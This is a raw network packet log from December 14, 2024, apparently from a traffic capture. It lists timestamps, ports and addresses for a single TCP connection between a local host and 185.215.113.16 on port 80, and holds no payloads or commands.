Dec 14, 2024 12:56:35.219969988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.220046043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.220175982 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.220993996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.221055984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.221134901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.221182108 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.222177982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.222224951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.222301960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.222347021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.223396063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.223444939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.223448038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.223490953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.224520922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.224597931 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.224637985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.224684954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.225732088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.225836039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.225882053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.226866007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.227056026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.227102041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.228097916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.228143930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.228192091 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.228235960 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.229260921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.229326963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.229368925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.229407072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.230449915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.230498075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.230531931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.230575085 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.362256050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.362353086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.362746000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.362777948 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.362819910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.362842083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.363379955 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.363430023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.363432884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.363473892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.364504099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.364559889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.364775896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.364890099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.365699053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.365753889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.365762949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.365910053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.366928101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.367038012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.367084026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.368088961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.368146896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.368158102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.368222952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.369244099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.369292021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.369376898 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.369425058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.370517969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.370546103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.370572090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.370589018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.371542931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.371598005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.371625900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.371679068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.372731924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.372808933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.372868061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.373917103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.373980045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.375094891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.375113010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.375140905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.375155926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.375185013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.376291990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.376395941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.376466036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.377440929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.377537012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.377569914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.377588987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.378648043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.378714085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.378746986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.378773928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.379807949 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.379857063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.379904032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.379944086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.380964994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.381097078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.382185936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.382236958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.382246971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.382623911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.383383036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.383483887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.383761883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.384522915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.384615898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.384682894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.385072947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.385694027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.385811090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.385874987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.386878014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.386923075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.386989117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.388087034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.388087988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.388133049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.388274908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.388324022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.389297962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.389316082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.389343023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.389358997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.390450954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.390599966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.390633106 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.390647888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.391647100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.391741991 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.391778946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.391930103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.392772913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.392817974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.392883062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.392927885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.394004107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.394062996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.394087076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.394130945 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.395199060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.395267010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.395306110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.395344019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.396305084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.396368980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.396423101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.396543980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.397430897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.397497892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.397658110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.398607016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.398653030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.398747921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.398787022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.399797916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.399861097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.399900913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.400964975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.401067019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.401119947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.402152061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.402267933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.402312994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.403354883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.403408051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.403446913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.403501987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.404515028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.404557943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.404616117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.404654026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.405683994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.405775070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.405817032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.406893969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.406945944 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.406996012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.407035112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.408363104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.408454895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.408495903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.409396887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.409441948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.409471989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.409523010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.410743952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.410824060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.410875082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.411933899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.412039042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.412096977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.413058043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.413084030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.413103104 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.413120031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.414103031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.414258003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.414329052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.415280104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.415328026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.415400028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.415447950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.416300058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.416445971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.416490078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.417620897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.417680979 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.417752028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.417834997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.418648005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.418730974 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.418762922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.418778896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.419811964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.419923067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.419946909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.419981956 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.421062946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.421130896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.421149969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.421171904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.422225952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.422276974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.422341108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.422542095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.423381090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.423434973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.554553986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.554579973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.554616928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.554641008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.554871082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.554903984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.554934978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.554958105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.555934906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.556025982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.556078911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.556107044 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.557074070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.557117939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.557271957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.557317019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.558264971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.558330059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.558376074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.558419943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.559456110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.559505939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.559564114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.559624910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.560554028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.560625076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.560712099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.560759068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.562652111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.562700987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.563167095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.563183069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.563205004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.563211918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.563231945 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.563249111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.564106941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.564155102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.564275980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.564321995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.565320015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.565367937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.565442085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.565500021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.566512108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.566562891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.566621065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.566684008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.567645073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.567712069 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.567774057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.567817926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.568969011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.569017887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.569063902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.569109917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.570015907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.570060968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.570113897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.570158005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.571187019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.571233034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.571253061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.571295977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.572395086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.572442055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.572520018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.572581053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.573533058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.573611975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.573668957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.573709011 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.574693918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.574742079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.574949980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.574995995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.575906038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.575951099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.575970888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.576015949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.577239037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.577290058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.577342033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.577387094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.578294039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.578331947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.578356028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.578389883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.579447031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.579494953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.579572916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.579613924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.580610991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.580656052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.580698967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.580745935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.581818104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.581883907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.581928015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.582034111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.583014011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.583060980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.583106041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.583237886 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.584225893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.584286928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.584325075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.584368944 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.585367918 CET	80	49827	185.215.113.16	192.168.2.4
